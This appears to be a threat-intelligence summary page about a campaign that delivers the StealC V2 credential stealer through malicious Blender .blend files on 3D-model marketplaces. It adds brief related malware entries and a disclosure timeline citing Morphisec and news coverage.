StealC V2 weaponized Blender asset delivery
Malware Activity
Summary
Hide ▲
Show ▼
The StealC V2 malware is being spread through manipulated Blender .blend files, creating a new delivery path that can compromise users who open routine 3D assets. If Auto Run is enabled, hidden Python code starts a multistage infection that can install persistence and pull more payloads. The activity has been observed for at least six months and uses Pyramid C2 for encrypted payload retrieval, increasing the chance of successful credential theft and foothold retention.
Related Happenings
Gremlin stealer modular toolkit evolution
Malware Activity
First: 15.05.2026 17:19
Last: 15.05.2026 17:19
Sources 1
About this happening:
The **Gremlin stealer** malware has expanded into a **modular toolkit** with **session-hijacking** and **crypto clipping** capabilities, raising the risk of credential theft and a...
Gremlin stealer modular toolkit evolution
Malware ActivityAbout this happening: The **Gremlin stealer** malware has expanded into a **modular toolkit** with **session-hijacking** and **crypto clipping** capabilities, raising the risk of credential theft and a...
PCPJack worm-like credential theft framework
Malware Activity
First: 07.05.2026 20:45
Last: 07.05.2026 20:45
Sources 1
About this happening:
The **PCPJack** malware framework now conducts **credential theft** across exposed cloud infrastructure, raising the risk of account takeover and follow-on intrusion. It matters b...
PCPJack worm-like credential theft framework
Malware ActivityAbout this happening: The **PCPJack** malware framework now conducts **credential theft** across exposed cloud infrastructure, raising the risk of account takeover and follow-on intrusion. It matters b...
Blender malicious .blend file campaign delivering StealC V2
Campaign
First: 25.11.2025 13:28
Last: 25.11.2025 13:28
Sources 1
How related:
"This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader,"
About this happening:
A **six-month** malicious-file campaign is abusing **Blender .blend files** on **CGTrader** to execute embedded scripts and deliver **StealC V2**, putting 3D asset downloaders at...
Blender malicious .blend file campaign delivering StealC V2
CampaignHow related: "This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader,"
About this happening: A **six-month** malicious-file campaign is abusing **Blender .blend files** on **CGTrader** to execute embedded scripts and deliver **StealC V2**, putting 3D asset downloaders at...
Russian-linked StealC V2 Blender marketplace delivery campaign
Campaign
First: 25.11.2025 00:00
Last: 25.11.2025 00:00
Sources 1
How related:
A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader.
About this happening:
A **Russian-linked campaign** is distributing **StealC V2** through malicious **.blend files** on **3D model marketplaces** and putting **Blender users** at risk of credential the...
Russian-linked StealC V2 Blender marketplace delivery campaign
CampaignHow related: A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader.
About this happening: A **Russian-linked campaign** is distributing **StealC V2** through malicious **.blend files** on **3D model marketplaces** and putting **Blender users** at risk of credential the...
AkdoorTea backdoor delivered through Windows batch-script ZIP chain
Malware Activity
First: 25.09.2025 16:14
Last: 25.09.2025 16:14
Sources 1
About this happening:
The newly documented **AkdoorTea** backdoor is being delivered through a **Windows batch script**, expanding the malware toolkit used against targeted developers. The delivery cha...
AkdoorTea backdoor delivered through Windows batch-script ZIP chain
Malware ActivityAbout this happening: The newly documented **AkdoorTea** backdoor is being delivered through a **Windows batch script**, expanding the malware toolkit used against targeted developers. The delivery cha...
Timeline
-
24.11.2025 16:00 2 articles · 6mo ago
Morphisec discloses StealC V2 hidden in Blender .blend files
Initial DisclosureMorphisec said Russian-speaking threat actors were distributing StealC V2 through manipulated Blender .blend files on CGTrader and similar platforms, with victims opening routine 3D assets in Blender’s Auto Run feature enabling concealed Python scripts to launch a multistage infection. The chain began with a tampered Rig_Ui.py script, fetched a loader from workers.dev, downloaded PowerShell and ZIP payloads, created LNK files for persistence, and used Pyramid C2 channels to retrieve encrypted payloads; Morphisec also said its deception-based controls stopped the credential theft before exfiltration or persistence could occur.
Show sources
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28